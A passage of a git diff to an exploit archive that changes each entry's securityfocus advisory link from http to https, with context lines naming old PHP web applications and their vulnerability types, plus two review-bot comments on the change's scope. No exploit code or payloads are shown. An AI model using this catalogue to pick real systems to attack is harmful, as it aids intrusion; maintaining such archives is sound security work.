@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15196/info +source: https://www.securityfocus.com/bid/15196/info phpMyAdmin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26393.txt b/exploits/php/webapps/26393.txt index 10f8e7ba9..062f40b2e 100644 --- a/exploits/php/webapps/26393.txt +++ b/exploits/php/webapps/26393.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15196/info +source: https://www.securityfocus.com/bid/15196/info phpMyAdmin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26394.txt b/exploits/php/webapps/26394.txt index a67ea3ad8..b1cfaf2e5 100644 --- a/exploits/php/webapps/26394.txt +++ b/exploits/php/webapps/26394.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15198/info +source: https://www.securityfocus.com/bid/15198/info MWChat is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26395.txt b/exploits/php/webapps/26395.txt index e3f30de69..ba45d0198 100644 --- a/exploits/php/webapps/26395.txt +++ b/exploits/php/webapps/26395.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15199/info +source: https://www.securityfocus.com/bid/15199/info Basic Analysis And Security Engine is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26396.pl b/exploits/php/webapps/26396.pl index 37542a81d..647369e5b 100755 --- a/exploits/php/webapps/26396.pl +++ b/exploits/php/webapps/26396.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15204/info +source: https://www.securityfocus.com/bid/15204/info MyBulletinBoard is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26397.txt b/exploits/php/webapps/26397.txt index 2aed5ed28..d9fa42ada 100644 --- a/exploits/php/webapps/26397.txt +++ b/exploits/php/webapps/26397.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15205/info +source: https://www.securityfocus.com/bid/15205/info A remote SQL injection vulnerability reportedly affects ipbProArcade. diff --git a/exploits/php/webapps/26399.txt b/exploits/php/webapps/26399.txt index b8868e4a4..cd191a149 100644 --- a/exploits/php/webapps/26399.txt +++ b/exploits/php/webapps/26399.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15207/info +source: https://www.securityfocus.com/bid/15207/info vCard is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26400.txt b/exploits/php/webapps/26400.txt index 3a9581db5..6d9b7cc73 100644 --- a/exploits/php/webapps/26400.txt +++ b/exploits/php/webapps/26400.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15209/info +source: https://www.securityfocus.com/bid/15209/info Flyspray is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26423.txt b/exploits/php/webapps/26423.txt index b80e1ba8d..71b0049cd 100644 --- a/exploits/php/webapps/26423.txt +++ b/exploits/php/webapps/26423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15212/info +source: https://www.securityfocus.com/bid/15212/info Mantis is prone to a remote and local file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 
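Review bot: The substitution needs to be shown as scoped to the `source:` header on line 1, and the hunks in this run (26396.pl through 26423.txt) do not show the rest of each file. Every hunk here is `@@ -1,4 +1,4 @@`, changes only the scheme, and keeps the bid number identical between the `-` and `+` lines, which is what you want. If this was generated by a tree-wide replace, please state the exact command in the commit message and confirm it was anchored on the `source: ` prefix, so that URLs inside the archived proof-of-concept bodies stay byte-for-byte as published. A grep for any remaining `source: http://www.securityfocus.com` after the change would also show that the rewrite is complete.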
diff --git a/exploits/php/webapps/26425.pl b/exploits/php/webapps/26425.pl index 3335f1bb9..157281f50 100755 --- a/exploits/php/webapps/26425.pl +++ b/exploits/php/webapps/26425.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15214/info +source: https://www.securityfocus.com/bid/15214/info Info-DB is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26427.txt b/exploits/php/webapps/26427.txt index 1ad82d09b..1c53ba6ce 100644 --- a/exploits/php/webapps/26427.txt +++ b/exploits/php/webapps/26427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15216/info +source: https://www.securityfocus.com/bid/15216/info gCards is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26428.html b/exploits/php/webapps/26428.html index 46e1e24a4..775e3ad22 100644 --- a/exploits/php/webapps/26428.html +++ b/exploits/php/webapps/26428.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15218/info +source: https://www.securityfocus.com/bid/15218/info Search Enhanced module for is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26431.txt b/exploits/php/webapps/26431.txt index bc1658c52..5775cc00e 100644 --- a/exploits/php/webapps/26431.txt +++ b/exploits/php/webapps/26431.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15221/info +source: https://www.securityfocus.com/bid/15221/info ATutor is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/26432.txt b/exploits/php/webapps/26432.txt index f910934c6..96c7b3ecc 100644 --- a/exploits/php/webapps/26432.txt 
+++ b/exploits/php/webapps/26432.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15221/info +source: https://www.securityfocus.com/bid/15221/info ATutor is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/26433.txt b/exploits/php/webapps/26433.txt index 001020292..6e0700ca4 100644 --- a/exploits/php/webapps/26433.txt +++ b/exploits/php/webapps/26433.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15221/info +source: https://www.securityfocus.com/bid/15221/info ATutor is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/26434.txt b/exploits/php/webapps/26434.txt index d9601701a..77e00d406 100644 --- a/exploits/php/webapps/26434.txt +++ b/exploits/php/webapps/26434.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15223/info +source: https://www.securityfocus.com/bid/15223/info PBLang is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26436.txt b/exploits/php/webapps/26436.txt index 1e3b03fdf..2cecd9469 100644 --- a/exploits/php/webapps/26436.txt +++ b/exploits/php/webapps/26436.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15235/info +source: https://www.securityfocus.com/bid/15235/info MG2 is affected by an authentication bypass vulnerability. This issue can allow remote attackers to gain access to password protected image galleries. diff --git a/exploits/php/webapps/26437.txt b/exploits/php/webapps/26437.txt index fd6dbaef5..782ca7d8b 100644 --- a/exploits/php/webapps/26437.txt +++ b/exploits/php/webapps/26437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15237/info +source: https://www.securityfocus.com/bid/15237/info PHP Advanced Transfer Manager can allow remote attackers to gain unauthorized access. diff --git a/exploits/php/webapps/26438.txt b/exploits/php/webapps/26438.txt index 19bf584de..5e4d36c74 100644 
--- a/exploits/php/webapps/26438.txt +++ b/exploits/php/webapps/26438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15240/info +source: https://www.securityfocus.com/bid/15240/info Invision Gallery is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26440.txt b/exploits/php/webapps/26440.txt index dfb9da879..053eeaa24 100644 --- a/exploits/php/webapps/26440.txt +++ b/exploits/php/webapps/26440.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15244/info +source: https://www.securityfocus.com/bid/15244/info PHPcafe Tutorial Manager is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26441.txt b/exploits/php/webapps/26441.txt index 8f2cd6ea6..8aa4f8f43 100644 --- a/exploits/php/webapps/26441.txt +++ b/exploits/php/webapps/26441.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15245/info +source: https://www.securityfocus.com/bid/15245/info OaBoard is prone to multiple SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26442.txt b/exploits/php/webapps/26442.txt index e06989818..1ae318af5 100644 --- a/exploits/php/webapps/26442.txt +++ b/exploits/php/webapps/26442.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15248/info +source: https://www.securityfocus.com/bid/15248/info PHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26446.txt b/exploits/php/webapps/26446.txt index 7a2fa1fbc..1d58ec0b4 100644 --- a/exploits/php/webapps/26446.txt +++ b/exploits/php/webapps/26446.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15254/info +source: https://www.securityfocus.com/bid/15254/info vCard PRO is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26447.html b/exploits/php/webapps/26447.html index 8ed49e51d..5e6fcd81b 100644 --- a/exploits/php/webapps/26447.html +++ b/exploits/php/webapps/26447.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15257/info +source: https://www.securityfocus.com/bid/15257/info Elite Forum is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26455.txt b/exploits/php/webapps/26455.txt index 835ed7fa9..a9f4de6e3 100644 --- a/exploits/php/webapps/26455.txt +++ b/exploits/php/webapps/26455.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15260/info +source: https://www.securityfocus.com/bid/15260/info VUBB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26456.txt b/exploits/php/webapps/26456.txt index 770737593..ed001bf53 100644 --- a/exploits/php/webapps/26456.txt +++ b/exploits/php/webapps/26456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15267/info +source: https://www.securityfocus.com/bid/15267/info XMB Nexus Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26458.txt b/exploits/php/webapps/26458.txt index e964b8ed3..f0d553526 100644 --- a/exploits/php/webapps/26458.txt +++ b/exploits/php/webapps/26458.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15274/info +source: https://www.securityfocus.com/bid/15274/info News2Net is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26459.txt b/exploits/php/webapps/26459.txt index 85cff39bc..38749008a 100644 --- a/exploits/php/webapps/26459.txt +++ b/exploits/php/webapps/26459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15276/info +source: https://www.securityfocus.com/bid/15276/info phpWebThings is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26465.txt b/exploits/php/webapps/26465.txt index 1c9071497..e7587e7d8 100644 --- a/exploits/php/webapps/26465.txt +++ b/exploits/php/webapps/26465.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15295/info +source: https://www.securityfocus.com/bid/15295/info CuteNews is affected by a directory traversal vulnerability. diff --git a/exploits/php/webapps/26466.txt b/exploits/php/webapps/26466.txt index 87929df11..dd889bb3f 100644 --- a/exploits/php/webapps/26466.txt +++ b/exploits/php/webapps/26466.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15295/info +source: https://www.securityfocus.com/bid/15295/info CuteNews is affected by a directory traversal vulnerability. diff --git a/exploits/php/webapps/26467.txt b/exploits/php/webapps/26467.txt index 75e617f33..c517bac69 100644 --- a/exploits/php/webapps/26467.txt +++ b/exploits/php/webapps/26467.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15301/info +source: https://www.securityfocus.com/bid/15301/info PHP Handicapper is vulnerable to an HTTP response splitting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 
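Review bot: Documentation point on the 26428.html hunk earlier in this run: the unchanged context line reads "Search Enhanced module for is prone to an HTML injection vulnerability", so the product name after "module for" is missing from the description. That is outside the scope of a scheme-only URL rewrite and should not be changed in this commit, but since the `source:` link on line 1 is the only pointer to the original advisory, a follow-up that restores the product name from that advisory would make the entry usable for triage.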
diff --git a/exploits/php/webapps/26468.pl b/exploits/php/webapps/26468.pl index aae7c4409..d9a573370 100755 --- a/exploits/php/webapps/26468.pl +++ b/exploits/php/webapps/26468.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15313/info +source: https://www.securityfocus.com/bid/15313/info Galerie is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26469.txt b/exploits/php/webapps/26469.txt index ed3a2db1e..a61a1805f 100644 --- a/exploits/php/webapps/26469.txt +++ b/exploits/php/webapps/26469.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15324/info +source: https://www.securityfocus.com/bid/15324/info JPortal is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being used in an SQL query. diff --git a/exploits/php/webapps/26470.txt b/exploits/php/webapps/26470.txt index 9b68dbab0..c4dbfe7a2 100644 --- a/exploits/php/webapps/26470.txt +++ b/exploits/php/webapps/26470.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15324/info +source: https://www.securityfocus.com/bid/15324/info JPortal is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being used in an SQL query. diff --git a/exploits/php/webapps/26474.txt b/exploits/php/webapps/26474.txt index 38964914d..d56b1ba99 100644 --- a/exploits/php/webapps/26474.txt +++ b/exploits/php/webapps/26474.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15335/info +source: https://www.securityfocus.com/bid/15335/info PHPFM is prone to an arbitrary file upload vulnerability. diff --git a/exploits/php/webapps/26476.txt b/exploits/php/webapps/26476.txt index ae66df2a4..6214fea0d 100644 --- a/exploits/php/webapps/26476.txt +++ b/exploits/php/webapps/26476.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15340/info +source: https://www.securityfocus.com/bid/15340/info OSTE is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26477.txt b/exploits/php/webapps/26477.txt index a18b275ef..0e0e8b78f 100644 --- a/exploits/php/webapps/26477.txt +++ b/exploits/php/webapps/26477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15342/info +source: https://www.securityfocus.com/bid/15342/info XMB is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26478.txt b/exploits/php/webapps/26478.txt index 2907fbd56..d38012216 100644 --- a/exploits/php/webapps/26478.txt +++ b/exploits/php/webapps/26478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15344/info +source: https://www.securityfocus.com/bid/15344/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26480.txt b/exploits/php/webapps/26480.txt index d9136b308..f480b8c56 100644 --- a/exploits/php/webapps/26480.txt +++ b/exploits/php/webapps/26480.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15348/info +source: https://www.securityfocus.com/bid/15348/info toendaCMS is reported prone to a directory traversal vulnerability. It is demonstrated that this issue may be leveraged to disclose the contents of arbitrary web-server readable files. diff --git a/exploits/php/webapps/26481.txt b/exploits/php/webapps/26481.txt index 2289d649d..8982432f0 100644 --- a/exploits/php/webapps/26481.txt +++ b/exploits/php/webapps/26481.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15350/info +source: https://www.securityfocus.com/bid/15350/info PHPList is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly santize user-supplied input. diff --git a/exploits/php/webapps/26482.txt b/exploits/php/webapps/26482.txt index 83db65eae..c83468ccb 100644 --- a/exploits/php/webapps/26482.txt +++ b/exploits/php/webapps/26482.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15350/info +source: https://www.securityfocus.com/bid/15350/info PHPList is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly santize user-supplied input. diff --git a/exploits/php/webapps/26483.txt b/exploits/php/webapps/26483.txt index b5b516f3c..43c549b21 100644 --- a/exploits/php/webapps/26483.txt +++ b/exploits/php/webapps/26483.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15350/info +source: https://www.securityfocus.com/bid/15350/info PHPList is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly santize user-supplied input. diff --git a/exploits/php/webapps/26484.txt b/exploits/php/webapps/26484.txt index 58a3e00dd..885a0985b 100644 --- a/exploits/php/webapps/26484.txt +++ b/exploits/php/webapps/26484.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15350/info +source: https://www.securityfocus.com/bid/15350/info PHPList is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly santize user-supplied input. diff --git a/exploits/php/webapps/26485.txt b/exploits/php/webapps/26485.txt index 769448e7d..b3bd0a183 100644 --- a/exploits/php/webapps/26485.txt +++ b/exploits/php/webapps/26485.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15350/info +source: https://www.securityfocus.com/bid/15350/info PHPList is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly santize user-supplied input. diff --git a/exploits/php/webapps/26486.txt b/exploits/php/webapps/26486.txt index 2396b8082..d905a9384 100644 --- a/exploits/php/webapps/26486.txt +++ b/exploits/php/webapps/26486.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15361/info +source: https://www.securityfocus.com/bid/15361/info SAP Web Application Server is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26487.txt b/exploits/php/webapps/26487.txt index 7207a55a9..828a927f4 100644 --- a/exploits/php/webapps/26487.txt +++ b/exploits/php/webapps/26487.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15361/info +source: https://www.securityfocus.com/bid/15361/info SAP Web Application Server is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26488.txt b/exploits/php/webapps/26488.txt index 43dc06de4..e5050ae61 100644 --- a/exploits/php/webapps/26488.txt +++ b/exploits/php/webapps/26488.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15362/info +source: https://www.securityfocus.com/bid/15362/info SAP Web Application Server is reported prone to a remote URI redirection vulnerability. diff --git a/exploits/php/webapps/26490.txt b/exploits/php/webapps/26490.txt index e18b3c19f..b7571f909 100644 --- a/exploits/php/webapps/26490.txt +++ b/exploits/php/webapps/26490.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15371/info +source: https://www.securityfocus.com/bid/15371/info TikiWiki is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26499.txt b/exploits/php/webapps/26499.txt index ebb9a745c..c14f86be7 100644 --- a/exploits/php/webapps/26499.txt +++ b/exploits/php/webapps/26499.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15396/info +source: https://www.securityfocus.com/bid/15396/info phpSysInfo is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26500.txt b/exploits/php/webapps/26500.txt index b1a7797bd..871ec2e22 100644 --- a/exploits/php/webapps/26500.txt +++ b/exploits/php/webapps/26500.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15399/info +source: https://www.securityfocus.com/bid/15399/info phpWebThings is prone to an SQL injection vulnerability. This is an input validation issue related to data that will be used in SQL queries, allowing a remote user to influence the structure and logic of a query. diff --git a/exploits/php/webapps/26501.txt b/exploits/php/webapps/26501.txt index 47f6fdab7..fe55621e2 100644 --- a/exploits/php/webapps/26501.txt +++ b/exploits/php/webapps/26501.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15400/info +source: https://www.securityfocus.com/bid/15400/info ActiveCampaign 1-2-All Broadcast Email is prone to an SQL-injection vulnerability. This is an input-validation issue related to data that will be used in SQL queries, allowing a remote user to influence the structure and logic of a query. diff --git a/exploits/php/webapps/26502.txt b/exploits/php/webapps/26502.txt index e0959a95f..bd981398e 100644 --- a/exploits/php/webapps/26502.txt +++ b/exploits/php/webapps/26502.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15404/info +source: https://www.securityfocus.com/bid/15404/info Help Center Live is prone to a local file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26503.txt b/exploits/php/webapps/26503.txt index 84d6ad7f0..b1ee77c00 100644 --- a/exploits/php/webapps/26503.txt +++ b/exploits/php/webapps/26503.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15410/info +source: https://www.securityfocus.com/bid/15410/info Wizz Forum is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26504.txt b/exploits/php/webapps/26504.txt index 5e9bc678d..3f37456ce 100644 --- a/exploits/php/webapps/26504.txt +++ b/exploits/php/webapps/26504.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15410/info +source: https://www.securityfocus.com/bid/15410/info Wizz Forum is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26505.txt b/exploits/php/webapps/26505.txt index 672e0ba22..8da90b457 100644 --- a/exploits/php/webapps/26505.txt +++ b/exploits/php/webapps/26505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15417/info +source: https://www.securityfocus.com/bid/15417/info Unspecified Codegrrl applications are prone to a remote arbitrary code execution vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26510.txt b/exploits/php/webapps/26510.txt index 16fa75de8..b2742f984 100644 --- a/exploits/php/webapps/26510.txt +++ b/exploits/php/webapps/26510.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15425/info +source: https://www.securityfocus.com/bid/15425/info Pearl Forums is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26511.txt b/exploits/php/webapps/26511.txt index 3bc930174..757b2c953 100644 --- a/exploits/php/webapps/26511.txt +++ b/exploits/php/webapps/26511.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15433/info +source: https://www.securityfocus.com/bid/15433/info Pearl Forums is prone to a local file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26512.txt b/exploits/php/webapps/26512.txt index 9ff08d390..7c8f3e7e0 100644 --- a/exploits/php/webapps/26512.txt +++ b/exploits/php/webapps/26512.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15436/info +source: https://www.securityfocus.com/bid/15436/info phpWCMS is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26513.txt b/exploits/php/webapps/26513.txt index e49fba458..9bf25bfa2 100644 --- a/exploits/php/webapps/26513.txt +++ b/exploits/php/webapps/26513.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15436/info +source: https://www.securityfocus.com/bid/15436/info phpWCMS is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26514.txt b/exploits/php/webapps/26514.txt index 0b99c7b02..95192f403 100644 --- a/exploits/php/webapps/26514.txt +++ b/exploits/php/webapps/26514.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15440/info +source: https://www.securityfocus.com/bid/15440/info phpwcms is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26515.txt b/exploits/php/webapps/26515.txt index d774c97cc..ba1890f51 100644 --- a/exploits/php/webapps/26515.txt +++ b/exploits/php/webapps/26515.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15441/info +source: https://www.securityfocus.com/bid/15441/info Template Seller Pro is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26516.txt b/exploits/php/webapps/26516.txt index 92ddeb09c..d8108b5e7 100644 --- a/exploits/php/webapps/26516.txt +++ b/exploits/php/webapps/26516.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15447/info +source: https://www.securityfocus.com/bid/15447/info Ekinboard is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26530.txt b/exploits/php/webapps/26530.txt index cea3aadd1..272013389 100644 --- a/exploits/php/webapps/26530.txt +++ b/exploits/php/webapps/26530.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60823/info +source: https://www.securityfocus.com/bid/60823/info GLPI is prone to a remote PHP code-execution vulnerability. diff --git a/exploits/php/webapps/26535.txt b/exploits/php/webapps/26535.txt index 79135f8d6..5538e5fce 100644 --- a/exploits/php/webapps/26535.txt +++ b/exploits/php/webapps/26535.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15485/info +source: https://www.securityfocus.com/bid/15485/info LiteSpeed Web Server is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26538.txt b/exploits/php/webapps/26538.txt index c42a77cd2..ce0c3a360 100644 --- a/exploits/php/webapps/26538.txt +++ b/exploits/php/webapps/26538.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15502/info +source: https://www.securityfocus.com/bid/15502/info PHP-Fusion is prone to SQL injection vulnerabilities in multiple PHP scripts. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26539.txt b/exploits/php/webapps/26539.txt index 473c81034..6c738bfe6 100644 --- a/exploits/php/webapps/26539.txt +++ b/exploits/php/webapps/26539.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15506/info +source: https://www.securityfocus.com/bid/15506/info Advanced Poll is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26541.txt b/exploits/php/webapps/26541.txt index 766987e06..0d08d5eeb 100644 --- a/exploits/php/webapps/26541.txt +++ b/exploits/php/webapps/26541.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15508/info +source: https://www.securityfocus.com/bid/15508/info SimplePoll is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26543.txt b/exploits/php/webapps/26543.txt index 083043289..e04ba46fe 100644 --- a/exploits/php/webapps/26543.txt +++ b/exploits/php/webapps/26543.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15513/info +source: https://www.securityfocus.com/bid/15513/info APBoard is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before it is used in SQL queries. diff --git a/exploits/php/webapps/26544.txt b/exploits/php/webapps/26544.txt index b845c830d..45da648d1 100644 --- a/exploits/php/webapps/26544.txt +++ b/exploits/php/webapps/26544.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15517/info +source: https://www.securityfocus.com/bid/15517/info PHP Download Manager is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26545.txt b/exploits/php/webapps/26545.txt index 4a456a026..6a355b6ef 100644 --- a/exploits/php/webapps/26545.txt +++ b/exploits/php/webapps/26545.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15519/info +source: https://www.securityfocus.com/bid/15519/info Nuke ET is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26546.txt b/exploits/php/webapps/26546.txt index a8f86fff4..abb6ce146 100644 --- a/exploits/php/webapps/26546.txt +++ b/exploits/php/webapps/26546.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15524/info +source: https://www.securityfocus.com/bid/15524/info PHP-Post is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26547.txt b/exploits/php/webapps/26547.txt index 356ef5d04..d7d2df546 100644 --- a/exploits/php/webapps/26547.txt +++ b/exploits/php/webapps/26547.txt 
